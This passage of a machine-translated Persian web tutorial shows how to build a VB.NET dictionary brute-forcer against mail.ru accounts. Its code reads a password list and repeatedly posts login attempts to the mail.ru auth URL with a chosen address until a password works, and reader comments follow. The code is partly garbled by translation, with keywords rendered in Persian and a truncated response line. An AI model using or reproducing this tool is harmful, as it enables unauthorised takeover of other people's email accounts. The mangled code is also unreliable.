6) حالا بیایید داده های سمت چپ را وارد کرده و نتیجه را تجزیه و تحلیل کنیم.

می بینیم که کوکی ها ایجاد نمی شوند.

عالی! اکنون می دانیم که چگونه brute force را بنویسیم:

ابتدا، بیایید یک آرایه را اعلام کنیم که در آن رمزهای عبور را از فرهنگ لغت قرار می دهیم:

PassList عمومی به عنوان ArrayList جدید

کد دکمه "..." (سه نقطه):

Dim f As New OpenFileDialog "ایجاد یک گفتگوی باز فایل جدید اگر f.ShowDialog = Windows.Forms.DialogResult.OK و f.FileName<>"" سپس "اگر کاربر لیستی را انتخاب کرده است، PassList.AddRange(IO.File.ReadAllLines(f.FileName)) "خواندن تمام رمزهای عبور در آرایه txtPassList.Text=f.FileName" مسیر فایل را در جعبه متن پایان اگر

حالا کد دکمه Start Search:

اگر txtLogin.Text<>"" سپس " اگر یک لاگین وارد کرده اید، سپس Dim i As Integer = 0 " یک شمارنده برای جستجو برای i = 0 To PassList.Count - 1 " اعلام کنید تا زمانی که رمزهای عبور وجود دارد جستجو کنید System.Threading.Thread.Sleep(1000) Dim درخواست به عنوان Net. HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text، "@ ")(1 ) _ & "&Password=" & PassList(i)) " فرم درخواستی Dim Response As Net.HttpWebResponse "روش انتقال داده: Request.Method = "POST" "منع انتقال خودکار Request.AllowAutoRedirect = False "ارسال یک درخواست پاسخ = درخواست. i)) "نمایش رمز عبور صحیح Exit Sub" جستجو را پایان دهید If Next End If

اگر چیزی مبهم است، برای من بنویسید. من اطلاعات تماس خود را در زیر می گذارم.

ما یک فرهنگ لغت رمز عبور مانند:

[این رمز عبور صحیح است]

234411dsdfd

متن قرمز را به رمز عبور خود کپی کرده و تغییر دهید.

ما همه چیز را به برنامه وصل می کنیم:

برای شروع جستجو کلیک کنید.

اگر می بینید که پنجره رمز عبور انتخاب شده است، همه چیز کار می کند.

P.S بابت اشتباهات تایپی پوزش می طلبم.

P.P.S اگر چیزی مشخص نیست، پس بنویسید. همیشه خوشحالم که کمک می کند!


نظرات ()

کولخاتسکر

کد رو بهت میدم!!! اینها چه جور مردمی هستند؟!

XeoN

چه چیزی آن را برجسته می کند؟؟

کولخاتسکر

بنابراین، به VB.NET منتقل شد. لعنتی، همه همه چیز را برای هک می نویسند، پس اگر فقط می نوشتند، سعی می کردند کد را برجسته کنند!

یک درخواست بزرگ از نسل های بعدی: کد را انتخاب نکنید!!!

آرتیوم

شما یک مگا قدرت بد هستید

منبع لینک

حداقل منبع رو بذارید

دیکوسار کولیا

درس بسیار مفید :) من همه این کارها را در ویژوال بیسیک 2008 انجام دادم، اگرچه کمی آن را ویرایش کردم.

 


خواندن:



بین حروف کوچک و بزرگ جابجا شوید

بین حروف کوچک و بزرگ جابجا شوید

کامپیوترهای مدرن تقریباً در هر فعالیتی به دستیاران ضروری ما تبدیل شده اند. با کمک آنها می توانیم اوقات فراغت خود را بگذرانیم، خرید کنیم، ...

اگر رمز عبور الگوی خود را فراموش کرده اید چگونه قفل گوشی خود را باز کنید: همه روش ها

اگر رمز عبور الگوی خود را فراموش کرده اید چگونه قفل گوشی خود را باز کنید: همه روش ها

مدل های مدرن سامسونگ گلکسی فرصت های زیادی برای حفظ امنیت داده های کاربر دارند. در اینجا شما یک سنسور اثر انگشت دارید ...

بررسی دقیق مشخصات Nubia Z11 Nubian z11

بررسی دقیق مشخصات Nubia Z11 Nubian z11

از زمان Nubia Z9، من می خواستم دستگاه های بدون فریم پرچمدار این خط را آزمایش کنم، اما هنوز نتوانستم. به عنوان مثال گذشته ...

چرخاندن صفحات در فایل های PDF یا تصحیح موقعیت صفحه

چرخاندن صفحات در فایل های PDF یا تصحیح موقعیت صفحه

حالا بیایید صفحه جلد را به موقعیت صحیح بچرخانیم.صفحه در جهت مشخص شده 90 درجه می چرخد.دستور File >... را از منو انتخاب کنید.

فید-تصویر RSS